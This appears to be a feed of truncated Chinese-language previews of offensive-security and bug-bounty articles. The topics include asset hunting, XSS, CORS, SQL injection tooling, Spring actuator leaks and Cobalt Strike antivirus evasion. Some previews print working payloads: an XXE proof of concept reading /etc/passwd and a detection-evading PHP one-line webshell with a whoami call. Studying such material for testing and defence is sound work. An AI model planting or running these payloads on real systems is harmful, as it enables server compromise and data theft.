前言 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。 一、信息收集 这里通过fofa进行收集，语法为：body=某棋牌 &am...

### 背景 安全小天地某个私密项目中涉及到一个app的测试，打开一看，证书校验--不让抓包，信息加密-无法篡改，遇到这种情况怎么，正常我这种小菜鸡都是直接放弃了，奈何厂家奖金给的高啊，我还...

http://github.com/XiaoTouMingyo/ProxySqlMap 使用教程: 配置->配置 程序使用需要配置SQLmapApi以及监听端口: 在SQLMAP中使用命令开开启SQLmapApi: sqlmapapi -s --host=0.0.0.0 --port=889...

如果目录扫描发现springboot的/actuator，但是拿不到关键的heapdump或env等信息，可以查看该服务器是否开放redis服务，如果有，可以访问http://xxx.huoxian.cn:6375/actuator/redis/info读取red...

web漏洞挖掘指南 XSS跨站脚本攻击 一、漏洞原理 1. 跨站脚本英文全称（Cross Site Scripting跨站脚本），为了不和css层叠样式表(英文全称：Cascading Style Sheets)混淆，因此将跨站脚本缩写为X...

1、以下面网站为例，密码为：qazwsx123，首先抓包，发现加密后的密码为：/BB3blYPP6yJ8QPgX1gkQA==，对应字段loginPwd 2、密码无法进行常规解码方式解开时，但是我们想对此处进行相关测试，比如...

0x00 前言: 最近闲来无事搞了一个免杀平台玩儿玩儿，用于生成免杀Cobalt Strike木马和免杀加载一些其它shellcode(如msf、自定义等)，这里就和大家分享一下免杀思路。 通过本篇文章你将学会： 杀...

有回显，用以下poc直接读取/etc/passwd： <?xml version='1.0'?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><foo>&am...

信息收集之快速提取SSL证书里的域名 echo '唯品会（原Vipshop.com）特卖会：品牌特卖_确保正品_确保低价_货到付款' | httpx -tls-probe -json -silent | jq .tls.dns_names #安全小天地Zone Tip...

#原创文章# 前言 上次听了火器的线上分享会议有提到火器的资产关联大概的思路，真的是收获了很多。再夸夸火器，在挖一些项目中的确能省掉很多资产收集的时间。本文主要参考上次会议中提交的一些...

漏洞报告 Mattermost #1216203 Mattermost Server OAuth Flow Cross-Site Scripting Kubernetes #1167773 Loading YAML in Java client can lead to command execution Nextcloud #1194606 Virt...

无敏感函数的php一句话(php中可用`来执行系统命令，相当于system、eval等函数)，执行命令:shell.php?1=whoami Gif89a <?php $a = `$_GET[1]`; echo $a; ?> 文字来源于- 火线 Zone-云安全...

http://github.com/ggg4566/SQLEXP SQL 注入利用工具，存在waf的情况下自定义编写tamper脚本 dump数据. 对于SQL注入漏洞利用通常情况下我们使用SQLMAP，在waf存在的场景下想利用自己独有的paylo...

web漏洞挖掘指南 前端跨域漏洞 一、何为跨域 1.设想一种场景，一个恶意网站上嵌入了一个iframe标签去加载银行的登陆页面，高度和宽度的设置和真实的银行官网一样，当用户访问恶意网站并登录时，...

前言： 第一次挖这家src，看src自己给出的资产(赞一个)，打开网站是一个电子商务C2C业务，大致扫了一眼业务，网站功能挺多的，出了不少货，挖的过程中，导致一些诡异的逻辑被触发了，在此仅对系...

应用场景：验证码没有设置失效时间，且请求包可无限重放（比如登录，注册，绑定，解绑，修改密码，领优惠券等实际场景） 某支付众测案例：验证码有效期过长导致银行卡与任意xx账号绑定 绑定银行...